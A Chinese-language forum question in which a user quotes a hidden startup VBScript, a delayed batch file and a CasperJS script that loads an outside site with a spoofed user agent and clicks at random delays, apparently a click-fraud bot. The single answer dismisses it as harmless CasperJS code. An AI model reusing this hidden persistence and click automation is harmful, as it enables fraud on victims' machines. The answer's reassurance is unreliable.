今天,当我启动计算机并加载 Windows 时,Notepad++ 打开了,其中加载了以下文件:
Set shell = WScript.CreateObject("WScript.Shell")
shell.Run("C:\projects\bat.bat"), 0 , True
然后我去调查“项目”文件夹,发现有两个名为 casperjs 和 phantomjs 的程序。bat.bat 文件中包含以下代码:
@echo off
timeout /t 600
cd/projects
phantomjs master.js
master.js 是最可疑的文件,因为其中包含以下代码:
phantom.casperPath = "/projects/casperjs";
phantom.injectJs(phantom.casperPath + '/bin/bootstrap.js');
var utils = require('utils');
var casper = require('casper').create();
var mouse = require("mouse").create(casper);
casper.userAgent('Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.120 Safari/537.36');
casper.start('http://www.extensafree.fulba.com/views/').viewport(1200, 1000);
function getRandomIntFromRange(min, max) {
return Math.round(Math.random() * (max - min)) + min;
}
casper.then(function () {
for (i = 0; i <= 0; i++) {
delay = getRandomIntFromRange(1000, 6000);
this.wait(delay, (
function (j, d) {
return function () {
this.echo(this.getTitle() + '; delay: ' + d);
casper.then(function () {
casper.mouse.click(190, 205);
});
};
})(i, delay));
}
});
casper.then(function () {
for (i = 0; i <= 0; i++) {
delay = getRandomIntFromRange(1000, 5000);
this.wait(delay, (
function (j, d) {
return function () {
this.echo(this.getTitle() + '; delay: ' + d);
casper.then(function () {
casper.mouse.click(370, 410);
});
};
})(i, delay));
}
});
casper.then(function () {
for (i = 0; i <= 0; i++) {
delay = getRandomIntFromRange(1300, 7000);
this.wait(delay, (
function (j, d) {
return function () {
this.echo(this.getTitle() + '; delay: ' + d);
casper.then(function () {
casper.mouse.click(370, 410);
});
};
})(i , delay));
}
});
casper.then(function () {
for (i = 0; i <= 0; i++) {
delay = getRandomIntFromRange(1300, 8000);
this.wait(delay, (
function (j, d) {
return function () {
this.echo(this.getTitle() + '; delay: ' + d);
casper.then(function () {
casper.mouse.click(370, 410);
});
};
})(i , delay));
}
});
casper.then(function () {
for (i = 0; i <= 0; i++) {
delay = getRandomIntFromRange(1300, 8000);
this.wait(delay, (
function (j, d) {
return function () {
this.echo(this.getTitle() + '; delay: ' + d);
casper.then(function () {
casper.mouse.click(900, 400);
});
};
})(i , delay));
}
});
casper.then(function () {
for (i = 0; i <= 0; i++) {
delay = getRandomIntFromRange(1300, 18000);
this.wait(delay, (
function (j, d) {
return function () {
this.echo(this.getTitle() + '; delay: ' + d);
casper.then(function () {
casper.mouse.click(400, 100);
});
};
})(i , delay));
}
});
casper.then(function () {
for (i = 0; i <= 0; i++) {
delay = getRandomIntFromRange(1300, 8000);
this.wait(delay, (
function (j, d) {
return function () {
this.echo(this.getTitle() + '; delay: ' + d);
};
})(i, de lay));
}
});
casper.then(function () {
casper.exit();
});
casper.run();
我立即移动了这些文件夹并从 Windows 开始菜单启动文件夹中删除了 shell.vbs。这是某种病毒吗?我需要进一步清理吗?我有 Avast 防病毒免费版和 Windows 7。两者都已完全更新。
答案1
我认为这不是病毒或类似的东西。
CasperJS 是一个用 Javascript 编写的 PhantomJS 和 SlimerJS 导航脚本和测试实用程序
这只是一个 JS 框架,所以你的脚本可能确实是一段糟糕的代码!这是官方的网站!它们是开源的,所以你可以验证一切!(大多数防病毒软件都有“发送”这样的功能,公司会测试发送的程序。)